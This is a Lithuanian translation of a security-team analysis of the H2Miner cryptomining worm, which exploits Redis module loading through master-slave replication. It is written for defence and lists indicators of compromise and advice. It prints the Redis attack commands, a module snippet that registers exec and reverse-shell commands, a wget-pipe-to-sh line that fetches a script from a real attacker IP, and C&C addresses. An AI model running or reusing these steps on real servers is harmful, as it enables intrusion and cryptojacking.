Aptiktas naujas H2Miner kirminų protrūkis, kuris išnaudoja Redis RCE

Prieš dieną vieną iš mano projekto serverių užpuolė panašus kirminas. Ieškodamas atsakymo į klausimą „kas tai buvo? Radau puikų Alibaba Cloud Security komandos straipsnį. Kadangi šio straipsnio apie Habré neradau, nusprendžiau jį išversti specialiai jums <3

Įrašas

Neseniai „Alibaba Cloud“ saugos komanda aptiko staigų H2Miner protrūkį. Šio tipo kenkėjiški kirminai naudoja Redis prieigos trūkumą arba silpnus slaptažodžius kaip vartus į jūsų sistemas, o po to sinchronizuoja savo kenkėjišką modulį su vergu per pagrindinio ir vergo sinchronizavimą ir galiausiai atsisiunčia šį kenkėjišką modulį į užpultą kompiuterį ir vykdo kenkėjišką nurodymus.

Anksčiau atakos prieš jūsų sistemas pirmiausia buvo vykdomos naudojant metodą, apimantį suplanuotas užduotis arba SSH raktus, kurie buvo įrašyti į jūsų kompiuterį, užpuolikui prisijungus prie Redis. Laimei, šis metodas negali būti dažnai naudojamas dėl problemų, susijusių su leidimų valdymu arba dėl skirtingų sistemos versijų. Tačiau šis kenkėjiško modulio įkėlimo būdas gali tiesiogiai vykdyti užpuoliko komandas arba gauti prieigą prie apvalkalo, o tai pavojinga jūsų sistemai.

Dėl didelio internete talpinamų Redis serverių skaičiaus (beveik 1 mln.), „Alibaba Cloud“ saugos komanda, kaip draugišką priminimą, rekomenduoja vartotojams nesidalinti Redis internete ir reguliariai tikrinti savo slaptažodžių stiprumą ir ar jie nėra pažeisti. greitas pasirinkimas.

H2Miner

„H2Miner“ yra „Linux“ pagrįstų sistemų kasybos robotų tinklas, kuris gali įsiveržti į jūsų sistemą įvairiais būdais, įskaitant „Hadoop“ verpalų, „Docker“ ir „Redis“ nuotolinio komandų vykdymo (RCE) pažeidžiamumą. Botnetas veikia atsisiųsdamas kenkėjiškus scenarijus ir kenkėjiškas programas, kad galėtų išgauti jūsų duomenis, išplėsti ataką horizontaliai ir palaikyti komandų ir valdymo (C&C) ryšius.

Redis RCE

Žiniomis šia tema dalijosi Pavelas Toporkovas per „ZeroNights 2018“. Po 4.0 versijos Redis palaiko papildinio įkėlimo funkciją, kuri suteikia vartotojams galimybę įkelti failus, sudarytus naudojant C, į Redis, kad būtų vykdomos konkrečios Redis komandos. Ši funkcija, nors ir naudinga, turi pažeidžiamumą, dėl kurio pagrindinio-pavaldžio režimu failai gali būti sinchronizuojami su vergu per visiško sinchronizavimo režimą. Tai gali naudoti užpuolikas, norėdamas perkelti kenkėjiškus failus. Baigę perdavimą, užpuolikai įkelia modulį į užpultą Redis egzempliorių ir vykdo bet kurią komandą.

Kenkėjiškų programų kirminų analizė

Neseniai „Alibaba Cloud“ saugos komanda atrado, kad „H2Miner“ kenkėjiškų kasėjų grupės dydis staiga smarkiai išaugo. Remiantis analize, bendras užpuolimo procesas yra toks:

H2Miner naudoja RCE Redis visavertei atakai. Užpuolikai pirmiausia atakuoja neapsaugotus Redis serverius arba serverius su silpnais slaptažodžiais.

Tada jie naudoja komandą config set dbfilename red2.so norėdami pakeisti failo pavadinimą. Po to užpuolikai vykdo komandą slaveof nustatyti pagrindinio-pavaldžiojo replikacijos pagrindinio kompiuterio adresą.

Kai užpultas Redis egzempliorius užmezga pagrindinį ir pavaldų ryšį su kenkėjiška Redis, kuri priklauso užpuolikui, užpuolikas siunčia užkrėstą modulį naudodamas komandą fullresync, kad sinchronizuotų failus. Tada failas red2.so bus atsisiųstas į užpultą įrenginį. Tada užpuolikai naudoja ./red2.so įkėlimo modulį, kad įkeltų šį so failą. Modulis gali vykdyti užpuoliko komandas arba inicijuoti atvirkštinį ryšį (backdoor), kad gautų prieigą prie užpulto įrenginio.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Įvykdę kenkėjišką komandą, pvz / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, užpuolikas iš naujo nustatys atsarginės kopijos failo pavadinimą ir iškraus sistemos modulį, kad pašalintų pėdsakus. Tačiau red2.so failas vis tiek liks užpultame kompiuteryje. Vartotojams patariama atkreipti dėmesį į tokio įtartino failo buvimą jų Redis egzemplioriaus aplanke.

Užpuolikas ne tik nužudė kai kuriuos kenkėjiškus procesus, kad pavogtų išteklius, bet ir sekė kenkėjišku scenarijumi, atsisiųsdamas ir vykdydamas kenksmingus dvejetainius failus 142.44.191.122/kinsing. Tai reiškia, kad proceso pavadinimas arba katalogo pavadinimas, kuriame yra kinsing pagrindiniame kompiuteryje, gali reikšti, kad tas įrenginys buvo užkrėstas šiuo virusu.

Remiantis atvirkštinės inžinerijos rezultatais, kenkėjiška programa daugiausia atlieka šias funkcijas:

• Failų įkėlimas ir vykdymas
• Kasyba
• C&C ryšio palaikymas ir užpuolikų komandų vykdymas

Išoriniam nuskaitymui naudokite masscan, kad padidintumėte savo įtaką. Be to, programoje C&C serverio IP adresas yra sunkiai užkoduotas, o užpultas kompiuteris su C&C komunikacijos serveriu susisieks naudodamas HTTP užklausas, kur HTTP antraštėje identifikuojama zombių (pažeisto serverio) informacija.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Kiti atakos būdai

Kirmino naudojami adresai ir nuorodos

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Patarimas

Pirma, Redis neturėtų būti pasiekiamas iš interneto ir turėtų būti apsaugotas stipriu slaptažodžiu. Taip pat svarbu, kad klientai patikrintų, ar Redis kataloge nėra failo red2.so ir ar pagrindinio kompiuterio failo/proceso pavadinime nėra „kinsing“.

Šaltinis: www.habr.com